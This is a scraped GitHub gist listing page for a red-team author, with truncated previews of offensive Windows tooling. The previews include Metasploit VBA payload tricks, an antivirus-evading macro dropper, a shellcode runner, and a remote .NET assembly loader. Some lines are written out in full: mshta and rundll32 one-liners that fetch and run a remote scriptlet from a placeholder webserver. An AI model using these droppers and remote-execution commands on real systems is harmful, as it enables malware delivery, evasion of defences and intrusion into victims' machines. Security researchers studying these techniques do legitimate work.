Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block Arno0x

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View mergeVBAPayload.vba
' Sometimes, after generating a metasploit payload with vba output format, you get a payload which is too long
' for the vba line continuation limit (24 line continuation max)
' So you have to split the payload in two arrays, then merge them again.
' This snippet shows the simple trick
Dim PayloadPart1, PayloadPart2, Final As Variant
PayloadPart1 = Array ( whatever metasploit first part payload with line _
continuation _
View macro_evade_av_01.vba
' Author Arno0x0x -
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers
View officeEmbeddedFileDecode.vba
' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
' This macro searches for a marker paragraph, namely "marker" in the example below
' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
' a local file.
' Example, in the word document:
' marker
' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....
# -*- coding: utf8 -*-
# This script executes a Windows shellcode within python process memory.
# Author: Arno0x0x, Twitter: @Arno0x0x
# Create a windows executable: pyinstaller --onefile --noconsole
from ctypes import *
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
import argparse
Arno0x / loadAssembly_method1.ps1
Last active Oct 9, 2018
Load a .Net assembly dynamically from PowerShell
View loadAssembly_method1.ps1
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
Arno0x / calc.hta
Created Nov 17, 2017
HTML Application example to be executed by mstha.exe
View calc.hta
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
Arno0x / scriptlet.sct
Created Nov 17, 2017
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
View scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
echo "Base64 encoded, ready to be used with 'powershell -e':"
echo "$1" | iconv --to-code UTF-16LE | base64 -w 0
Arno0x / service.cs
Created Sep 5, 2017
A basic Windows service written in .Net/c#
View service.cs
Creates a basic Windows Service using .Net framework.
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs
Create the service with name "Service":
sc create Service type=own binpath= c:\Path\To\service.exe
Start the service:
You can’t perform that action at this time.